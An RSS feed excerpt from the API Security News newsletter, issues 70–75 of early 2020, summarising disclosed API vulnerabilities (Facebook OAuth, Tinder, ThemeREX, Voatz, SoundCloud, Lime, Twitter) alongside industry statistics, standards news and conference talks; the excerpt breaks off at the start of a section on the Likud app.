<p>Are you doing DevSecOps on Azure Pipelines and developing REST APIs? Next Wednesday, March 25, Steven Murawski (Microsoft Azure) and Isabelle Mauny (42Crunch) are giving a <a href="https://42crunch.com/webinar-rest-api-security-by-design-azure-pipelines/" target="_blank" rel="noopener noreferrer">webinar on that exact topic</a>. Click <a href="https://42crunch.com/webinar-rest-api-security-by-design-azure-pipelines/" target="_blank" rel="noopener noreferrer">here</a> to reserve your spot and find out how you can automate API security analysis right in your Azure CI/CD pipeline.</p>
<p><a href="https://42crunch.com/webinar-rest-api-security-by-design-azure-pipelines/"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-6738" src="https://apisecurity.io/wp-content/uploads/2020/03/azure-speakers-2.png" alt="" width="700" height="337" /></a></p>
<h2>Videos: The GCP Metadata API</h2>
<p>The recording of the session &#8220;The GCP Metadata API&#8221; by Dylan Ayrey and Allison Donovan from the BSides San Francisco 2020 conference is now available.</p>
<p>Ayrey and Donovan look into what cloud (AWS &amp; GCP) metadata APIs are and why they are so powerful, go through sample attacks, and how vendors and users can protect their systems.</p>
<p><iframe loading="lazy" title="BSidesSF 2020 - The GCP Metadata API (Dylan Ayrey • Allison Donovan)" width="640" height="360" src="https://www.youtube.com/embed/z5hPU3g2aZ8?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></p>
<p>The post <a href="https://apisecurity.io/issue-75-98-iot-traffic-unencrypted-api-devsecops-azure-pipelines/">Issue 75: 98% of IoT traffic unencrypted, API DevSecOps in Azure Pipelines</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 74: Vulnerability in Login with Facebook, API security talks</title>
		<link>https://apisecurity.io/issue-74-vulnerability-in-login-with-facebook-api-security-talks/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 11 Mar 2020 22:00:41 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=6727</guid>

					<description><![CDATA[<p>This week, we check out how Facebook&#8217;s OAuth implementation in their social login feature left the access tokens vulnerable. We also have some statistics and predictions on the rise of API security, and recordings of a couple of more API security talks have been published. Vulnerability: OAuth in Login with Facebook Doing a bullet-proof OAuth [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-74-vulnerability-in-login-with-facebook-api-security-talks/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-74-vulnerability-in-login-with-facebook-api-security-talks/">Issue 74: Vulnerability in Login with Facebook, API security talks</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we check out how Facebook&#8217;s OAuth implementation in their social login feature left the access tokens vulnerable. We also have some statistics and predictions on the rise of API security, and recordings of a couple of more API security talks have been published.</p>
<h2>Vulnerability: OAuth in Login with Facebook</h2>
<p>Doing a bullet-proof OAuth implementation that works across multiple domains is not a trivial task to do.<a href="https://www.amolbaikar.com/facebook-oauth-framework-vulnerability/" target="_blank" rel="noopener noreferrer"> Amol Baikar found a flaw in Facebook&#8217;s OAuth implementation</a> in the Login with Facebook feature.</p>
<p>An incorrectly configured API in Login with Facebook allowed attackers to lure users to a malicious website they controlled to steal users&#8217; OAuth access tokens. This in turn could even lead to a full account takeover. Because of the nature of the feature, this could give the attackers access to multiple other third-party apps and services that used these access tokens.</p>
<p>The vulnerability was a combination of multiple factors including secondary unused endpoints, lack of security headers, lack of JavaScript function tampering protection, lack of regex validation, etc. See Amol&#8217;s writeup for details.</p>
<p>Facebook luckily fixed this vulnerability promptly, but it does show how important it is to pay extra attention to getting your authentication right.</p>
<h2>Industry statistics: Rise of API security</h2>
<p>National Cyber Security (NCS) has <a href="https://nationalcybersecurity.com/cybersecurity-hackerspace-now-is-the-time-to-focus-on-api-security/" target="_blank" rel="noopener noreferrer">a useful summary of the latest statistics on the rise of API security</a>. According to them:</p>
<ul>
<li>API data breaches could represent more than 50% of records lost in the coming months and become the single largest vector of large-scale hacking. According to Verizon’s 2019 Data Breach Incident Report, external hacking remained the largest threat actor (69%) and threat action (53%) respectively for data breaches reported last year. And the top threat vector successfully attacked was web applications, at approximately 67% of the time. APIs make large-scale attacks easier to automate and execute.</li>
<li>Shadow APIs continue to emerge as a new threat to cloud-first enterprises. Developers are spinning up APIs all the time and companies have little understanding of how many APIs they have, where, and who is responsible for them. According to the ESG Report on Security for DevOps, the top new investment that enterprises plan to make to secure cloud-native apps will be API Security (37% of all respondents marked this as the most important new control needed for cloud security).</li>
<li>Serverless continues to outpace Kubernetes and container usage. According to CB Insights, serverless is now the highest growth public cloud service ahead of containers, batch computing, machine learning and IoT services. Serverless spending is expected to reach $7.7 billion by 2021, up from $1.9 billion in 2016 with an estimated CAGR of 33%.</li>
<li>Fines from the California Consumer Privacy Act (CCPA, took effect January 1, 2020) are projected to rise over $200 million already during its first year.</li>
</ul>
<h2>Videos: APIs in gift card fraud</h2>
<p>Tanay Deshmuck&#8217;s practical demo from the recent RSA conference on using APIs for gift card fraud has been published.</p>
<p>The 15-year-old shows how he uses Fiddler and OpenBullet to discover web and mobile APIs, and run credential stuffing attacks on them. The video also touches on SQL injections, ways to counter the attacks, as well as tooling.</p>
<p><iframe loading="lazy" title="API Security Exposure for Gift Card Fraud: A 15-Year-Old’s Guide" width="640" height="360" src="https://www.youtube.com/embed/idRqtaaBPzQ?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></p>
<h2>Videos: API security concerns</h2>
<p>The recording of Inon Shkedy&#8217;s talk &#8220;API Security Concerns&#8221; from Checkmarx meetup is also out. Shkedy&#8217;s talk covers, among other things:</p>
<ul>
<li>API security challenges (authentication, authorization, leaking data, mass assignments, CSRF)</li>
<li>Discovering and mitigating issues</li>
<li>Lots of real-life examples</li>
<li>Pentesting tips</li>
</ul>
<p><iframe loading="lazy" title="Meetups at Checkmarx: API Security Concerns (Part II)" width="640" height="360" src="https://www.youtube.com/embed/wY6q583JWLc?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></p>
<p>The post <a href="https://apisecurity.io/issue-74-vulnerability-in-login-with-facebook-api-security-talks/">Issue 74: Vulnerability in Login with Facebook, API security talks</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 73: Up to 75% credential abuse attacks target APIs</title>
		<link>https://apisecurity.io/issue-73-up-to-75-credential-abuse-attacks-target-apis/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 04 Mar 2020 22:00:10 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=6697</guid>

					<description><![CDATA[<p>This week, we check how Tinder&#8217;s API vulnerability has developed a life of its own, the latest statistics from Akamai on API security, the best current practices for JWT, and why API security needs both API firewalls and API management, not just either or. Vulnerability: Tinder Back in July 2019, we covered the OWASP API3:2019 — [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-73-up-to-75-credential-abuse-attacks-target-apis/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-73-up-to-75-credential-abuse-attacks-target-apis/">Issue 73: Up to 75% credential abuse attacks target APIs</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we check how Tinder&#8217;s API vulnerability has developed a life of its own, the latest statistics from Akamai on API security, the best current practices for JWT, and why API security needs <em>both</em> API firewalls and API management, not just either or.</p>
<h2>Vulnerability: Tinder</h2>
<p>Back in <a href="https://apisecurity.io/issue-41-tinder-and-axway-breached-equifax-fined/" target="_blank" rel="noopener noreferrer">July 2019</a>, we covered the <a href="https://apisecurity.io/encyclopedia/content/owasp/api3-excessive-data-exposure.htm" target="_blank" rel="noopener noreferrer">OWASP API3:2019 — Excessive data exposure</a> vulnerability in Tinder APIs.  The premium features, such as unblurred images of those who like you, were not enforced on API-level. Thus, a suitable crafted request to the API could by-pass these restrictions.</p>
<p>Now, there&#8217;s a Reddit page with simple instructions and both <a href="https://twitter.com/underthebreach/status/1234901658934665216" target="_blank" rel="noopener noreferrer">Chrome and Firefox have extensions that exploit this flaw</a>:</p>
<p><img loading="lazy" decoding="async" class="alignnone size-medium" src="https://pbs.twimg.com/media/ESM_ritWAAAAN_c?format=png&amp;name=900x900" width="740" height="417" /><img loading="lazy" decoding="async" class="alignnone size-medium" src="https://pbs.twimg.com/media/ESNAZR5WkAQEzbA?format=png&amp;name=900x900" width="845" height="329" /></p>
<p>Your APIs are your interface. If there is information that you do not want to expose to users, do not expose it in APIs. It does not take long these days until someone figures out the data that you return or even makes it widely accessible — like in this case.</p>
<h2>Industry statistics: Akamai sees growth in API attacks</h2>
<p><a href="https://www.akamai.com/us/en/resources/our-thinking/state-of-the-internet-report/global-state-of-the-internet-security-ddos-attack-reports.jsp" target="_blank" rel="noopener noreferrer">Akamai&#8217;s has published its &#8220;2020 State of the Internet / Security: Financial Services&#8221; report</a>, and it includes some very interesting statistics:</p>
<ul>
<li>
<blockquote><p><em>From May 2019 and continuing on until the end of the year, there was a dramatic shift by criminals who started targeting APIs, in an effort to bypass security controls.</em></p></blockquote>
</li>
<li>
<blockquote><p><em>Up to 75% of all credential abuse attacks against the financial services industry targeted APIs directly.</em></p></blockquote>
</li>
<li>
<blockquote><p><em>On August 7, 2019, Akamai recorded the single largest credential stuffing attack against a financial services firm [&#8230;] consisting of 55,141,782 malicious login attempts. This attack was a mix of API targeting, and other methodologies.</em></p></blockquote>
</li>
<li>
<blockquote><p><em>On August 25, in a separate incident, the criminals targeted APIs directly, in a run that consisted of more than 19 million credential abuse attacks.</em></p></blockquote>
</li>
</ul>
<p>(Quotes are from <a href="https://www.akamai.com/us/en/about/news/press/2020-press/state-of-the-internet-security-financial-services-hostile-takeover-attempts.jsp" target="_blank" rel="noopener noreferrer">Akamai&#8217;s press release.)</a></p>
<p>Another clear example on how the predictions on the increased importance of API security are coming true. <a href="https://www.gartner.com/en/documents/3834704" target="_blank" rel="noopener noreferrer">According to Gartner</a>, by 2022 APIs will become the most common attack vector.</p>
<h2>Standards: JWT Best Current Practices</h2>
<p><a href="https://tools.ietf.org/html/rfc7519" target="_blank" rel="noopener noreferrer">JSON Web Token (JWT)</a>  Best Current Practices are now <a href="https://www.rfc-editor.org/rfc/rfc8725.html" target="_blank" rel="noopener noreferrer">an official BCP 225 &amp; RFC 8725 document</a>. Great work by Yaron Sheffer, Dick Hardt, and Mike Jones.</p>
<p>JWT is now the prevalent way of passing identity information in REST API calls. Thus, JWT security is paramount for REST security in general.</p>
<p>Quoting the RFC abstract:</p>
<p><em>&#8220;JSON Web Tokens, also known as JWT are URL-safe JSON-based security tokens that contain a set of claims that can be signed and/or encrypted. JWTs are being widely used and deployed as a simple security token format in numerous protocols and applications, both in the area of digital identity and in other application areas. This Best Current Practices document updates RFC 7519 to provide actionable guidance leading to secure implementation and deployment of JWTs.&#8221;</em></p>
<p>If you prefer watching a video to reading an RFC, check out the 3 recordings that we featured in our <a href="https://apisecurity.io/issue-72-vulnerabilities-in-wordpress-themerex-addons-and-voatz-facebook-postmortem-jwt-talks-openapi-specification-3-0-3/" target="_blank" rel="noopener noreferrer">previous issue</a>.</p>
<h2>Opinion: API firewalls vs API management</h2>
<p>Runtime API protection can be done with both API gateways and API firewalls.</p>
<p>As always in the industry, the terminology can be confusing and the lines can get blurry. Check out <a href="https://42crunch.com/why-api-firewall/" target="_blank" rel="noopener noreferrer">Isabelle Mauny&#8217;s (42Crunch) take on the two and why both have their place</a>.</p>
<p>The post <a href="https://apisecurity.io/issue-73-up-to-75-credential-abuse-attacks-target-apis/">Issue 73: Up to 75% credential abuse attacks target APIs</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 72: Vulnerabilities in WordPress ThemeREX Addons and Voatz, Facebook postmortem, JWT talks, OpenAPI Specification 3.0.3</title>
		<link>https://apisecurity.io/issue-72-vulnerabilities-in-wordpress-themerex-addons-and-voatz-facebook-postmortem-jwt-talks-openapi-specification-3-0-3/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 26 Feb 2020 22:54:29 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=6668</guid>

					<description><![CDATA[<p>This week, we take a look at how WordPress got exploited by a 3rd-party plugin, and how API security research can sometimes be a very ungrateful endeavor. In addition, we also have the cost of ignoring API security as showcased by Facebook, as well as several good JSON Web Token (JWT) talks. And as a [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-72-vulnerabilities-in-wordpress-themerex-addons-and-voatz-facebook-postmortem-jwt-talks-openapi-specification-3-0-3/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-72-vulnerabilities-in-wordpress-themerex-addons-and-voatz-facebook-postmortem-jwt-talks-openapi-specification-3-0-3/">Issue 72: Vulnerabilities in WordPress ThemeREX Addons and Voatz, Facebook postmortem, JWT talks, OpenAPI Specification 3.0.3</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we take a look at how WordPress got exploited by a 3rd-party plugin, and how API security research can sometimes be a very ungrateful endeavor. In addition, we also have the cost of ignoring API security as showcased by Facebook, as well as several good JSON Web Token (JWT) talks. And as a cherry on top, we have a patch release to the OpenAPI Specification (OAS).</p>
<h2>Vulnerability: WordPress ThemeREX Addons plugin</h2>
<p><a href="https://www.wordfence.com/blog/2020/02/zero-day-vulnerability-in-themerex-addons-plugin-exploited-in-the-wild/" target="_blank" rel="noopener noreferrer">WordPress REST APIs got exposed and exploited through ThemeREX Addons plugin</a>, installed on about 44,000 sites.</p>
<p>This critical vulnerability allows remote code execution. Quoting the Wordfence researchers:</p>
<blockquote><p><em>&#8220;ThemeREX Addons is a plugin installed as a companion to many ThemeREX themes and provides a number of theme management features. One of the plugin’s functions registers a WordPress REST-API endpoint. When doing so, it does not verify that a request is coming from an administrative user.</em></p>
<p><em>While this is not cause for concern on its own, the endpoint allows any PHP function to be executed, rather than being limited to a select few functions. This means that remote code can be executed by any visitor, even those that are not authenticated to the site. The most worrisome capability that we are seeing actively attacked is the ability to create a new administrative user, which can be used for complete site takeover.&#8221;</em></p></blockquote>
<p><a href="https://themerex.net/wp/themerex-addons-vulnerability-fixed/" target="_blank" rel="noopener noreferrer">ThemeREX tells that they have already fixed the issue</a>.</p>
<h2>Case study: Voatz and anti-pentesting policies</h2>
<p><a href="https://internetpolicy.mit.edu/wp-content/uploads/2020/02/SecurityAnalysisOfVoatz_Public.pdf" target="_blank" rel="noopener noreferrer">MIT researchers Michael Specter, James Koppel, and Daniel Weitzner have reported multiple issues in Voatz</a>, a voting app used in the US elections.</p>
<p>In their scientific paper, the research team identifies several vulnerabilities, including man-in-the-middle (MITM) attacks on the API server of the app, that could allow attackers to discover the personal information or vote of the voter, or even submit votes.</p>
<p>The vendor claims that the votes are safe because Blockchain is used to record them. However, it is the backend server that adds the data to blockchain, thus any manipulation that happens on the mobile app, in the communication between the app and the server, and on the server itself would still be recorded as legitimate.</p>
<p>What is even more frustrating is that the researchers had to limit their research only to the fraction of the actual application. The application consists of the mobile app and the server with which the mobile app communicates over REST API. Neither of them are open source, and the mobile app is obfuscated to complicate research. The vendor does not allow API pentesting nor discloses the source code.</p>
<p>Not only can researchers not access the source code of the backend server, the vendor actually actively prohibits its pentesting and has a history of <a href="https://www.zdnet.com/article/mit-researchers-disclose-vulnerabilities-in-voatz-mobile-voting-election-app/" target="_blank" rel="noopener noreferrer">reporting earlier research attempts (by University of Michigan) to FBI</a>.</p>
<p>The research team has also published an <a href="https://internetpolicy.mit.edu/faq-on-the-security-analysis-of-voatz/" target="_blank" rel="noopener noreferrer">FAQ page on their research and the communication from the vendor</a>.</p>
<p>Modern applications are distributed by nature, and excluding backend components and APIs from security research significantly reduces the scope of vulnerabilities found, and thus reported and fixed. We encourage vendors running bug bounty programs to expand these to the complete solution and not just the client.</p>
<h2>Postmortem: Facebook API breach</h2>
<p>Laurence Dodds has compiled<a href="https://twitter.com/LFDodds/status/1226585722355777536" target="_blank" rel="noopener noreferrer"> a fascinating postmortem of the infamous Facebook API breach in this Twitter thread</a> (the one that <a href="https://apisecurity.io/issue-1-apistrat-cors-samsung-google-facebook-gitlab-apple/" target="_blank" rel="noopener noreferrer">we covered in our inaugural issue</a>).  The analysis is based on the documents disclosed in the lawsuits that followed the breach.</p>
<p>As Dodds&#8217; thread shows, the original security flaw was known already since December 2017, but de-prioritized. It was not until that flaw combined with two other issues and led to the breach that it eventually got fixed.</p>
<p>Another good example on how expensive neglecting API security can get.</p>
<h2>Videos: JWT security and best practices</h2>
<p>JWT has become the prevalent format of security token used in OAuth2 and OpenID Connect. Hence, it is the cornerstone of security of many REST APIs.</p>
<p>A few talks that cover JWT, its possible implementation vulnerabilities, security, and best practices have been recently published:</p>
<ul>
<li>Dmitry Sotnikov&#8217;s talk at AppSec California 2020:<br />
<iframe loading="lazy" title="Are You Properly Using JWTs? - Dmitry Sotnikov" width="640" height="360" src="https://www.youtube.com/embed/M3jA0bGDCso?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></li>
<li>Louis Nyffenegger at AppSec California 2020:<br />
<iframe loading="lazy" title="JWT Parkour - Louis Nyffenegger" width="640" height="360" src="https://www.youtube.com/embed/zWVRHK3ykfo?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></li>
<li>A JWT webinar by Philippe Leothaud from 42Crunch:<br />
<iframe loading="lazy" title="How to Properly Use JWTs (JSON Web Token)" width="640" height="360" src="https://www.youtube.com/embed/558MFgH1t9g?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></li>
</ul>
<h2>Standards: OpenAPI 3.0.3 released</h2>
<p>The OpenAPI Initiative (OAI), the standards body behind the prevalent REST API contract standard, have announced <a href="https://github.com/OAI/OpenAPI-Specification/releases/tag/3.0.3" target="_blank" rel="noopener noreferrer">the official release of the OpenAPI Specification v3.0.3</a>.</p>
<p>This is a patch release, so the changes are only improvements to readability and accuracy. No behavioral changes have been made to the specification.</p>
<p>The next OAS release, <a href="https://github.com/OAI/OpenAPI-Specification/tree/v3.1.0-dev" target="_blank" rel="noopener noreferrer">v3.1.0</a>, will contain some new features and elements (but no breaking changes). Its RC0 is expected soon.</p>
<p>The post <a href="https://apisecurity.io/issue-72-vulnerabilities-in-wordpress-themerex-addons-and-voatz-facebook-postmortem-jwt-talks-openapi-specification-3-0-3/">Issue 72: Vulnerabilities in WordPress ThemeREX Addons and Voatz, Facebook postmortem, JWT talks, OpenAPI Specification 3.0.3</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 71: Vulnerabilities in SoundCloud and Lime e-scooters, NIST Microservices security strategies</title>
		<link>https://apisecurity.io/issue-71-vulnerabilities-in-soundcloud-and-lime-scooters-nist-whitepaper-on-microservices-security-strategies/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 20 Feb 2020 00:03:47 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=6654</guid>

					<description><![CDATA[<p>This week, we take a look at the recent API vulnerabilities found in SoundCloud and the electric scooter service Lime. In addition, we have a set of tips for API penetration testing, and NIST whitepaper on the microservices security. Vulnerability: SoundCloud Paulo Silva has published a very systematic and thorough report on API vulnerabilities that [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-71-vulnerabilities-in-soundcloud-and-lime-scooters-nist-whitepaper-on-microservices-security-strategies/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-71-vulnerabilities-in-soundcloud-and-lime-scooters-nist-whitepaper-on-microservices-security-strategies/">Issue 71: Vulnerabilities in SoundCloud and Lime e-scooters, NIST Microservices security strategies</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we take a look at the recent API vulnerabilities found in SoundCloud and the electric scooter service Lime. In addition, we have a set of tips for API penetration testing, and NIST whitepaper on the microservices security.</p>
<h2>Vulnerability: SoundCloud</h2>
<p>Paulo Silva has published a very systematic and <a href="https://www.checkmarx.com/blog/checkmarx-research-soundcloud-api-security-advisory" target="_blank" rel="noopener noreferrer">thorough report on API vulnerabilities that the Checkmarx Security Research team found in SoundCloud</a>. (SoundCloud has promptly acknowledged and fixed the issues.)</p>
<p>The team discovered multiple API vulnerabilities, such as:</p>
<ul>
<li><a href="https://apisecurity.io/encyclopedia/content/owasp/api2-broken-authentication.htm" target="_blank" rel="noopener noreferrer">Broken authentication</a>
<p>The <code>/sign-in/password</code> endpoint of <code>api-v2.soundcloud.com</code> did not implement proper account lockout based on failed authentication attempts. It solely relied on rate limiting which can be evaded using several combinations of <code>use_agent</code>, <code>device_id</code>, and <code>signature</code>.</p>
<p>Combined with ability to enumerate account, this allowed attackers to locate valid user records and then brute force access using credential stuffing.</li>
<li>User enumeration
<p>The <code>/sign-in/identifier</code> and <code>/users/password_reset</code> endpoints returned different results when the login existed in the system compared to when no such user existed.</li>
<li><a href="https://apisecurity.io/encyclopedia/content/owasp/api4-lack-of-resources-and-rate-limiting.htm" target="_blank" rel="noopener noreferrer">Lack of resources and rate limiting</a>
<p>The <code>/tracks</code> endpoint did not implement proper resources limiting. It had no validation on the number of tracks IDs in the <code>ids</code> list, thus it was possible to manipulate the list to retrieve an arbitrary number of tracks in a single request. Researchers could use these parameters to get back up to 689 tracks in a single request.</p>
<p>The endpoint did not require authentication or authorization making it an easy target for Denial of Service and resource deprivation attacks.</p>
<p>Also, the <code>/me/play-history/tracks</code> endpoint did not enforce rate limiting, allowing a large number of POST requests.</li>
<li><a href="https://apisecurity.io/encyclopedia/content/owasp/api7-security-misconfiguration.htm" target="_blank" rel="noopener noreferrer">Security misconfiguration</a>
<p>Issuing a PUT request to <code>/users/{user_id}</code> with an already used <code>permalink</code> returned an unhandled Java exception (<code>java.lang.IllegalStateException</code>), which exposed information about the components and versions in use.</li>
<li>Insufficient validation for input on the API level could allow attackers to exploit the service
<p>The <code>/tracks/{track_urn}</code> endpoint did not properly validate and enforce the length of <code>description</code>, <code>title</code>, and <code>genre</code> properties</li>
</ul>
<p>As an active member of the <a href="https://apisecurity.io/encyclopedia/content/owasp/owasp-api-security-top-10.htm" target="_blank" rel="noopener noreferrer">OWASP API Security Top 10 project</a>, Silva is an excellent source of information on such issues.</p>
<p>Not only does the report provide full the details of the vulnerabilities, it also shows how serious they were in terms of the CVSS score and, more importantly, provides recommendations how to avoid these issues to begin with.</p>
<h2>Vulnerability: Lime electric scooters</h2>
<p>Amir Shladovsky and his team has done some excellent research on <a href="https://securityboulevard.com/2020/02/i-know-where-you-rode-last-summer-uncovering-the-security-issues-of-shared-scooter-services/" target="_blank" rel="noopener noreferrer">API vulnerabilities in the Lime scooter service</a> in Tel Aviv.</p>
<p>Lime mobile app had functionality on locating available scooters. The API for that functionality had a few major issues:</p>
<ul>
<li>It returned permanent IDs for each device</li>
<li>It allowed to keep calling the same API with different geo location parameters over and over again</li>
<li>It had poor rate limiting implementation</li>
</ul>
<p>A combination of these issues allowed researchers to script API calls with a grid of geo location parameters in the city. Thus, when someone rented a scooter, they could see that the scooter ID would disappear from the API response. Later they would see the ID reappear for another location.</p>
<p>Thus, the researchers could track routes of all devices and see where a particular user would ride a particular scooter.</p>
<p>They could even ring the bells of the scooters as a bonus:</p>
<p><iframe loading="lazy" title="Scooter Stalkers" width="640" height="480" src="https://www.youtube.com/embed/8E1qhDoERCk?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></p>
<p>We have previously covered vulnerabilities in electric scooters in issues <a href="https://apisecurity.io/issue-19-half-amazon-top-selling-smart-devices-found-vulnerable/" target="_blank" rel="noopener noreferrer">19</a> and <a href="https://apisecurity.io/issue-53-vulnerabilities-in-twitterkit-justdial-voi-e-scooters/" target="_blank" rel="noopener noreferrer">53</a>.</p>
<h2>Tips &amp; Tricks: API pentesting</h2>
<p>Inon Shkedy has put together a set of <a href="https://medium.com/bugbountywriteup/31-tips-api-security-pentesting-480b5998b765" target="_blank" rel="noopener noreferrer">31 tips for API penetration testing</a>.</p>
<p>This is a brilliant resource for anyone working with API security. The tips include:</p>
<ul>
<li>Authorization</li>
<li>Authentication</li>
<li>Attacks, such Cross Site Request Forgery (CSRF) or DoS</li>
<li>Data exposure</li>
<li>Mass assignment</li>
<li>Injections</li>
<li>Tools</li>
<li>What to do if you get stuck</li>
</ul>
<h2>Guidelines: Microservice security</h2>
<p class="LC20lb DKV0Md">We  first covered the National Institute of Standards and Technology (NIST) whitepaper &#8220;Security Strategies for Microservices-based Application Systems&#8221; by Ramaswamy Chandramouli in our issue <a href="https://apisecurity.io/issue-25-nist-microservices-guidelines-facebook-opens-pentesting/" target="_blank" rel="noopener noreferrer">25</a> when it opened for commenting.</p>
<p class="LC20lb DKV0Md">The final version of the whitepaper can be found <a href="https://doi.org/10.6028/NIST.SP.800-204" target="_blank" rel="noopener noreferrer">here</a>. It covers guidelines, for example:</p>
<ul>
<li class="LC20lb DKV0Md">Architectural frameworks</li>
<li class="LC20lb DKV0Md">Threats</li>
<li class="LC20lb DKV0Md">Security strategies for identity and access management (IAM)</li>
<li class="LC20lb DKV0Md">Discovery</li>
<li class="LC20lb DKV0Md">Communications</li>
<li class="LC20lb DKV0Md">Monitoring</li>
<li class="LC20lb DKV0Md">Resiliency</li>
<li class="LC20lb DKV0Md">Integrity</li>
<li class="LC20lb DKV0Md">Countering internet attacks</li>
</ul>
<p>The post <a href="https://apisecurity.io/issue-71-vulnerabilities-in-soundcloud-and-lime-scooters-nist-whitepaper-on-microservices-security-strategies/">Issue 71: Vulnerabilities in SoundCloud and Lime e-scooters, NIST Microservices security strategies</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 70: Vulnerabilities in Twitter, Likud, Iowa caucus apps, two API security talks</title>
		<link>https://apisecurity.io/issue-70-vulnerabilities-in-twitter-and-party-apps-two-api-security-talks/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 12 Feb 2020 23:58:35 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=6634</guid>

					<description><![CDATA[<p>This week, we check out a recent API vulnerability in Twitter. In addition, it looks like API vulnerabilities are a bit of theme in apps by political parties: vulnerabilities were discovered in apps by Israel&#8217;s Likud and the Democratic Party in USA. We also have two API security talks: one recorded and one upcoming webinar. [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-70-vulnerabilities-in-twitter-and-party-apps-two-api-security-talks/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-70-vulnerabilities-in-twitter-and-party-apps-two-api-security-talks/">Issue 70: Vulnerabilities in Twitter, Likud, Iowa caucus apps, two API security talks</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we check out a recent API vulnerability in Twitter. In addition, it looks like API vulnerabilities are a bit of theme in apps by political parties: vulnerabilities were discovered in apps by Israel&#8217;s Likud and the Democratic Party in USA. We also have two API security talks: one recorded and one upcoming webinar.</p>
<h2>Vulnerability: Twitter</h2>
<p><a href="https://privacy.twitter.com/en/blog/2020/an-incident-impacting-your-account-identity" target="_blank" rel="noopener noreferrer">Twitter has disclosed a recent API exploit</a>. The API endpoints to make finding friends in Twitter by their phone numbers easier were abused, possibly by state-sponsored actors, to mine accounts by mapping them to phone numbers. Detecting and throttling the exploit was hard because the phone numbers were not sequential and attackers used multiple accounts and IP addresses in their attacks.</p>
<p>Twitter has since changed the responses from API so that it no longer returns specific account names. They have also suspended any accounts involved in the exploit.</p>
<p>This is a reminder on why <a class="MiniTOC1" href="https://apisecurity.io/encyclopedia/content/owasp/api4-lack-of-resources-and-rate-limiting.htm">API4:2019 — Lack of resources and rate limiting</a> is a big deal for API security. A lot of companies view throttling as a mechanism of resource protection and think that generic rate limiting across APIs is sufficient.</p>
<p>Instead, they should identify sensitive API methods: such as the ones related to authentication, signup, password reset, and sensitive information access. Then, these endpoint should receive their own much more limited policies that would limit mass use and include automated lockouts to prevent abuse.</p>
<h2>Vulnerability: Likud Elector app</h2>
